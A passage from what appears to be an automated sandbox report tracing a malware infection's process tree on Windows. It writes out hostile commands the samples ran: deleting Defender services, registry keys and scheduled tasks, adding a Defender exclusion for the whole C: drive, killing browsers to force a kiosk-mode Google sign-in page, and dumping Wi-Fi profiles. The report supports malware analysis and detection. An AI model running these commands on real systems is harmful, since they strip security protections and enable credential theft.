PID:1356
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:364
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:2260
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:4080
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:6028
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:4928
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:2272
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:5924
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:5652
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:2200
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:1180
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:3580
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:5948
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:1312
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:4672
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:4908
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:3332
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:4708
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:4820
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:4892
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416950101\3sZiUQa.exe"C:\Users\Admin\AppData\Local\Temp\10416950101\3sZiUQa.exe"6⤵
- Executes dropped EXE
PID:5352
-
-
C:\Users\Admin\AppData\Local\Temp\10417510101\KXtPusH.exe"C:\Users\Admin\AppData\Local\Temp\10417510101\KXtPusH.exe"6⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3736 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All7⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3748 -
C:\Windows\SysWOW64\chcp.comchcp 650018⤵
- System Location Discovery: System Language Discovery
PID:2468
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile8⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5088
-
-
C:\Windows\SysWOW64\findstr.exefindstr All8⤵
- System Location Discovery: System Language Discovery
PID:5004
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3736 -s 24487⤵
- Program crash
PID:580
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid7⤵
- System Location Discovery: System Language Discovery
PID:5992 -
C:\Windows\SysWOW64\chcp.comchcp 650018⤵
- System Location Discovery: System Language Discovery
PID:2976
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid8⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5420
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10419550101\2c8d23ef22.exe"C:\Users\Admin\AppData\Local\Temp\10419550101\2c8d23ef22.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:448
-
-
C:\Users\Admin\AppData\Local\Temp\10419560101\ddb314f467.exe"C:\Users\Admin\AppData\Local\Temp\10419560101\ddb314f467.exe"6⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3204
-
-
C:\Users\Admin\AppData\Local\Temp\10419570101\cab1283345.exe"C:\Users\Admin\AppData\Local\Temp\10419570101\cab1283345.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5300 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2456
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6096
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1084
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4996
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1408
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:5004
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5240 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2016 -prefsLen 27099 -prefMapHandle 2020 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {c8b54d7c-83b0-494f-b1a7-005e9fee9707} -parentPid 5240 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5240" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:1268
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {a50275c8-53c0-476d-8346-e87dec17c015} -parentPid 5240 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5240" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:624
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3944 -prefsLen 25164 -prefMapHandle 3948 -prefMapSize 270279 -jsInitHandle 3952 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3960 -initialChannelId {2c0e4c85-7ed6-46cb-b79c-5140d5d32844} -parentPid 5240 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5240" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵
- Checks processor information in registry
PID:1020
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4112 -prefsLen 27276 -prefMapHandle 4116 -prefMapSize 270279 -ipcHandle 4184 -initialChannelId {878e219c-baa7-4966-8d63-5600959df065} -parentPid 5240 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5240" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:5348
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2968 -prefsLen 34775 -prefMapHandle 3000 -prefMapSize 270279 -jsInitHandle 3004 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2776 -initialChannelId {b51a831f-9ea9-4c42-9af8-f3ee47dea6d7} -parentPid 5240 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5240" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵
- Checks processor information in registry
PID:4604
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5040 -prefsLen 35012 -prefMapHandle 5168 -prefMapSize 270279 -ipcHandle 5144 -initialChannelId {618e9847-9f05-44fb-99fb-c4810b3c4425} -parentPid 5240 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5240" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵
- Checks processor information in registry
PID:4708
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5368 -prefsLen 32952 -prefMapHandle 5372 -prefMapSize 270279 -jsInitHandle 5376 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5352 -initialChannelId {da6a7cf7-d0fc-4a40-a012-4b5cb070e6d3} -parentPid 5240 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5240" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵
- Checks processor information in registry
PID:4312
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5416 -prefsLen 32952 -prefMapHandle 5400 -prefMapSize 270279 -jsInitHandle 5516 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5592 -initialChannelId {fded2c29-1089-437a-a062-fe9f19d35349} -parentPid 5240 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5240" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵
- Checks processor information in registry
PID:3220
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2768 -prefsLen 32952 -prefMapHandle 2984 -prefMapSize 270279 -jsInitHandle 1668 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5756 -initialChannelId {bb4801c8-764f-41cc-90d8-c4ee55c7728c} -parentPid 5240 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5240" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵
- Checks processor information in registry
PID:2268
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10419580101\53e64105fd.exe"C:\Users\Admin\AppData\Local\Temp\10419580101\53e64105fd.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704
-
-
C:\Users\Admin\AppData\Local\Temp\10419590101\f5cd7caa1f.exe"C:\Users\Admin\AppData\Local\Temp\10419590101\f5cd7caa1f.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4672 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4060
-
-
-
C:\Users\Admin\AppData\Local\Temp\10419600101\176117a9a6.exe"C:\Users\Admin\AppData\Local\Temp\10419600101\176117a9a6.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2220
-
-
C:\Users\Admin\AppData\Local\Temp\10419610101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10419610101\Rm3cVPI.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5996
-
-
C:\Users\Admin\AppData\Local\Temp\10419620101\UZPt0hR.exe"C:\Users\Admin\AppData\Local\Temp\10419620101\UZPt0hR.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:3228 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:4972
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4228
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:4376 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵
- Executes dropped EXE
PID:5300
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵
- Deletes itself
- Executes dropped EXE
PID:2732 -
C:\Users\Admin\AppData\Local\Temp\{260b7e13-606a-4960-8c7a-09e61300b00e}\5969479a.exe"C:\Users\Admin\AppData\Local\Temp\{260b7e13-606a-4960-8c7a-09e61300b00e}\5969479a.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot9⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:6436 -
C:\Users\Admin\AppData\Local\Temp\{68a40378-7cb7-467d-886f-bda91b067132}\5a11d930.exeC:/Users/Admin/AppData/Local/Temp/{68a40378-7cb7-467d-886f-bda91b067132}/\5a11d930.exe -accepteula -adinsilent -silent -processlevel 2 -postboot10⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Adds Run key to start application
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:7864
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10419630101\qWR3lUj.exe"C:\Users\Admin\AppData\Local\Temp\10419630101\qWR3lUj.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1620 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1200
-
-
-
C:\Users\Admin\AppData\Local\Temp\10419650101\ac5082e7c9.exe"C:\Users\Admin\AppData\Local\Temp\10419650101\ac5082e7c9.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2356
-
-
C:\Users\Admin\AppData\Local\Temp\10419670101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10419670101\7IIl2eE.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:6488 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat7⤵
- System Location Discovery: System Language Discovery
PID:6724 -
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:10000
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵
- System Location Discovery: System Language Discovery
PID:9988
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:10320
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"8⤵
- System Location Discovery: System Language Discovery
PID:10324
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183778⤵
- System Location Discovery: System Language Discovery
PID:10484
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab8⤵
- System Location Discovery: System Language Discovery
PID:10520
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation8⤵
- System Location Discovery: System Language Discovery
PID:10728
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com8⤵
- System Location Discovery: System Language Discovery
PID:10808
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N8⤵
- System Location Discovery: System Language Discovery
PID:10888
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:10944
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 58⤵
- System Location Discovery: System Language Discovery
PID:11092
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10419680101\h8NlU62.exe"C:\Users\Admin\AppData\Local\Temp\10419680101\h8NlU62.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:8784 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:8808
-
-
-
C:\Users\Admin\AppData\Local\Temp\10419690101\279ebdcc44.exe"C:\Users\Admin\AppData\Local\Temp\10419690101\279ebdcc44.exe"6⤵PID:12680
-
-
C:\Users\Admin\AppData\Local\Temp\10419700101\3sZiUQa.exe"C:\Users\Admin\AppData\Local\Temp\10419700101\3sZiUQa.exe"6⤵PID:3328
-
-
C:\Users\Admin\AppData\Local\Temp\10419710101\KXtPusH.exe"C:\Users\Admin\AppData\Local\Temp\10419710101\KXtPusH.exe"6⤵PID:7392
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All7⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4420 -
C:\Windows\SysWOW64\chcp.comchcp 650018⤵PID:7592
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile8⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1252
-
-
C:\Windows\SysWOW64\findstr.exefindstr All8⤵PID:3940
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7392 -s 22967⤵
- Program crash
PID:8360
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid7⤵PID:2588
-
C:\Windows\SysWOW64\chcp.comchcp 650018⤵PID:4972
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid8⤵PID:4484
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10419720101\f565c82372.exe"C:\Users\Admin\AppData\Local\Temp\10419720101\f565c82372.exe"6⤵PID:8048
-
-
C:\Users\Admin\AppData\Local\Temp\10419730101\e6911e6e00.exe"C:\Users\Admin\AppData\Local\Temp\10419730101\e6911e6e00.exe"6⤵PID:3484
-
-
-
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x498 0x2f41⤵
- Suspicious use of AdjustPrivilegeToken
PID:4980
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3736 -ip 37361⤵PID:1208
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4660
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:2940
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:4132
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5072
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{1ecfb85f-c304-4da8-be54-74c3b8a8fa08}\17c00725-0351-4b58-b404-eed076931aba.cmd"1⤵PID:7912
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:8144
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:8224
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:8312
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:8400
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8468
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:8624
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:8720
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:8876
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:9128
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:956
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9256
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:9376
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:9444
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9512
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9580
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:9652
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9720
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9788
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9856
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9924
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:10028
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10064
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10084
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10112
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10136
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10156
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10212
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10264
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10364
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10388
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10408
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10436
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10544
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10780
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10856
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10940
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11048
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11104
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11132
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11164
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:11184
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11244
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11272
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11296
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11348
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11364
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11420
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11448
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11524
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11608
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11636
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11704
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12188
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12068
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12044
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12292
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12392
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:12516
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:12544
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:12568
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:12636
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12712
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12864
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:12924
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12948
-
-
